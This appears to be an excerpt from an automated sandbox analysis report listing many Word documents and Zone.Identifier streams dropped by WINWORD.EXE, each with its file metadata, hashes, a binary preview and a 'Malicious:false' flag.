                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):198604
                            Entropy (8bit):7.9587584912750025
                            Encrypted:false
                            SSDEEP:6144:SR1vyleBewcLscOaa4mup1mv7lwmgJxgGY9:SbyycOtjup0v5IJGGY9
                            MD5:1F10D7459A0F5B8A0200F0ED79B92407
                            SHA1:12AE10BFAAC4337C8E62F7922FE2BB3F60FE8B4B
                            SHA-256:8942662C67B2F32A1C275748591A40C8B03B927D0E730EC0456A1AA9D4080FEC
                            SHA-512:E22A80009483FD11CAD9DF99F42FCF370067C4E29618B62FEC6DFC069F14797FEFC3BC561A556FCC48D8A393DC05321D21B6D05559BB36E05374EEDACD2D8F9F
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):199030
                            Entropy (8bit):7.958333543234928
                            Encrypted:false
                            SSDEEP:3072:JIb4K65iKJ1Sv/Bt3p/yEycEwDxZXg/5aCcgwH//mov7Q1Nkz0o3jYym5XgBYCkf:S4KG/fUZt56PcE2ZXyaZXV77zHmeGx
                            MD5:383150E824ACD1DB1E8F79FEAE17829E
                            SHA1:1E67DDA5866AE9DFE4DE2C897D8FC65275AB1795
                            SHA-256:66F9AE68A8D20658449251EA4A3969C0F3D2EADEAF10878124F460D305C87909
                            SHA-512:A9F1494408474F0C52BEEFD7FE20533DECA42C865E88676B05BDF161DDBC7FD9A6D53BB9934DA93A4BAFF7B24186B97FED0A6EA9C82946010FBDA072519EDDCA
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):115680
                            Entropy (8bit):7.945568032227481
                            Encrypted:false
                            SSDEEP:3072:JIbN6FKYBgQGdVIwGP8OLGEHxdx1UjQ1plt7BEB2V:SNsetVI9L/xdxdx3V
                            MD5:26CE4BE02B3E662527D42D30592F8712
                            SHA1:D977FD2B4A93A588A923D74F94C7D187CEE8AC69
                            SHA-256:83470C894A239A4E5A52A432D75F401AF8009A00B50BE35151C5A5CAA1ABB90E
                            SHA-512:CF2DF4217A6274364D80CF354E10756532CABF3276D63D79D6B169330FFE8398C1C646055B71BCED9FA6169FC5FF84D2D0FFDEC16C2016D2D435652CD69C6037
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):115520
                            Entropy (8bit):7.945194427807057
                            Encrypted:false
                            SSDEEP:3072:JIb8QDYBaGdVPU5Yt51WtmuthcYzBcHrBRPBv1Ea:S3sVPDbWtdJBcHlRPpl
                            MD5:7A6BFF22D71AC63548E7F74E7084367D
                            SHA1:94822B61AECF81942F74BBE5E44E6260D3EB2F64
                            SHA-256:7E637629AA434906C531BB323F0022A97B6C5F36C6C0A6A27CA666F2EC1C0F5C
                            SHA-512:243891B9886FCDF13025371D92FC68F2E3A4F13E5010858D6F961CA1B0035FE3F7E8B0BCB2163A535B10178BF0AF74C3366F13AE45920C4CF53175A9D64E8309
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):198614
                            Entropy (8bit):7.958110953175805
                            Encrypted:false
                            SSDEEP:3072:JIbQkAOLmQE9pMsCtek1NxVHLO/H+ZJGEEJhEm3+RudAcDYs/eKpBEyDo:SQ1smQK+teKxHLOkJG3JA8Dx/lpKyM
                            MD5:17580D7164CAA7862C4C999FABE93512
                            SHA1:A7C81224F85CBF771DDBA3E0EA9791F292329FB9
                            SHA-256:6CC0EDCCFFFFA443DAF007BAD160A29072266207A33611E6DD8B5D460188112C
                            SHA-512:78070F914EB3301804A1E48B615E3F3785D9FF27FAA491F78EFF7A6757C005E74FEFD8C978CAAFE8C9F4F695094832CDA326E974E2342AC812FC18E646B09E06
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):198334
                            Entropy (8bit):7.957683273774929
                            Encrypted:false
                            SSDEEP:6144:SJVm+ewi+txxYcQ+U2Z+f/O+1i/DARn3bsJ:SJVb62Zex1Mw3oJ
                            MD5:6AAE952D2DCC171EAAB017C444E38F07
                            SHA1:9E0575A736713054499B4D41FA60760914709A67
                            SHA-256:EC4219CAEAE1016173876A5DBE353DA4EA1502FACFB8C84DF9D93DF67085CA2E
                            SHA-512:ECE55483EE3818D127B71FF880B4A7501ABF55C6A9A2EF52A91BAA99C9B75DAF5F0839BF6F6C13ACD603876DA366A344A6FDDC329DE29E6B4A262B2AE9869A8A
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):198725
                            Entropy (8bit):7.958127880511422
                            Encrypted:false
                            SSDEEP:6144:S+yoPeh+gs4EIcKHmR+Yz8iTVhVeSKtHx:Ssn4Etp+Yz8i7cSKtHx
                            MD5:4D7869A7A870652C14AABE7F99B5747F
                            SHA1:BF76B693BE393EB61EAD0B2A04E4C394B9341E02
                            SHA-256:80B8A3BB56076AAC83B0C80E98D8543D80A2C9A04796C1A13C93E93DF744FB9D
                            SHA-512:EE813F8F02B7BB29086FED10930BA44627654078FCDEA309221F8E0130542B4CE2EE1209B247E9FBC7C72B4969E67A18A2F80499B574DEB1345E007C0D030F29
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):115511
                            Entropy (8bit):7.944704846358577
                            Encrypted:false
                            SSDEEP:3072:JIbj+WfGDyeMEe0HilfUmRit5PY+zmp+ITIyBQz2n:SZ8bolfUmeS+6pxRaKn
                            MD5:14D30699270923DE13ED4AC770172834
                            SHA1:552326F994EAFB48DFAD207F6D204CF3B1796D9B
                            SHA-256:22B2CD4006AE71C397A2119D29B3DA9AE8A1EBE7AA911A26BC9E0CF3E815227C
                            SHA-512:7142F13559BD2E8A17E562F978FF0F3589A842D74A1D7628BA0E1CB53D05196217A2C7CC91597031B614D892BE554D0F15E05D764073460281115FB512B58972
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):115506
                            Entropy (8bit):7.9460865250361685
                            Encrypted:false
                            SSDEEP:3072:JIbrxmOvAol8gxwo+uc8nYQuTUjgcOiWu+U2TkzISBV1x2V:SjvAol7xGL8nN2unOiCk0SD2V
                            MD5:75A52DB094166605345F22D83FCDCEA7
                            SHA1:0590768E4167F438CB9BD0F9B459F3554EE2A253
                            SHA-256:E62CF4B5A64CED5D7F9F8CDCFED8D70443AB34E9E181FAD1D9981377A16D67EF
                            SHA-512:E244AD434FDD54708C5F77CD32FCCBBAA3898B59A85DE42F6D9462168FF9DE95452CC9C1EE6389EB4FC980607CFC4F3D0C226A5BAB063C300349A0CBA56D60CC
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):115519
                            Entropy (8bit):7.945165622100143
                            Encrypted:false
                            SSDEEP:3072:JIbqFar2vxPBClfUmRafRJvVX7PSirFerBJZ:SqFxvlBClfUmQvVLPSirFGZ
                            MD5:0AB769B3BFD1EA54696D86D3AF8106A1
                            SHA1:0730EE85495BC3FE4FA848897A3121A5BB8EB6C7
                            SHA-256:0E63EE83A025F86A88A5817D2C558E89831D0C1378A890CECAB11BF1B36CACC2
                            SHA-512:5874E2B839D5AB8E1092282E5441CF9DC619A131A35A088F66AAF5484533351BA497D878D36F8B63E5B256A54268A51369A1D598037976D10B8007A3280CD273
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):198564
                            Entropy (8bit):7.958116537285494
                            Encrypted:false
                            SSDEEP:3072:JIbVbXytfoLPewcLsSUa7R/yMGc7GQcw9gM0ydUGDRLl2uK4F0uBQLe1xK:SFisPewcLs7a6XcKnm8iRLl2uK47iLeK
                            MD5:3F24EDBA12F0811F0ACB5AE04E49404E
                            SHA1:4534AE063E8DDAFF260C61A631E2DAC0D716578C
                            SHA-256:9D6DEBFB516E84C404EDE254757A0A663747FBEE3E286000AF9C951508433691
                            SHA-512:E25AFE01387F29E710D2CCAA19E8DBE6A4C646C77FCD6DA36139850BEAC3841C70D82E730F51281F01BB9F04710473549162D85D073834156709E86DA678091E
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):198329
                            Entropy (8bit):7.95817671529457
                            Encrypted:false
                            SSDEEP:3072:JIbkCLzXwaT/Bt3b6IRY56lfA4AOGX/uRs993j+ikqIeBn2aBZOzg:SXjwSZtrxYUlI4Zku81jq763Os
                            MD5:D001395D39C1959A26AE6C86DE2E7614
                            SHA1:A0C8EFD0E3F17065CCBBB6C9791E2231746F6F44
                            SHA-256:113C9039CB13B9E244A02DAFBF5FA67D8051812AECD45F4293436291A455A54A
                            SHA-512:43695F7BA9ECBC9158B1FD360FAA4D505E53FF6638C989206FE8CBB89CC0EA273F322B8BC5C63B14E1FAA6DCEEB4193DDC83C3A618D5BBD202F213B54DDF008D
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):198330
                            Entropy (8bit):7.957941332670774
                            Encrypted:false
                            SSDEEP:3072:JIbwfgXQ5c5BHrXxUVlTK5TpY4ao31bWMpIQt1zcZ9K6H4N8cHBjyh:SGgXc6HrBaK5dYnMNg9/kFHo
                            MD5:2D72106A85D017CC40FD9BE31E018128
                            SHA1:B04E4583562213BECBB5B38485F94B70DC86A5D9
                            SHA-256:CE2020FA66552A2E01F99F6A7A7D8A6424079D7F72A0C15750673E46EAADB311
                            SHA-512:E7A2CD014449D7E5220600B7284156BD9B17FA55A7C28386DBE90C9357899FBEAD4F05D8F181E479956066FF8C1231A3C1DE541D29200171A213D27504188AE6
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):115505
                            Entropy (8bit):7.944888964532376
                            Encrypted:false
                            SSDEEP:3072:JIbLPR6A16btfol8gaVfkLLWORKn8Y2HoBWu+jb2gB72ViSPz:SLF1Etfol7aVfknWORKn84Bbgt6
                            MD5:7ECDF7B154BD24EF4F91F691BB046654
                            SHA1:E3D6FE294562B801DD2EF80A82A9E47C478FB292
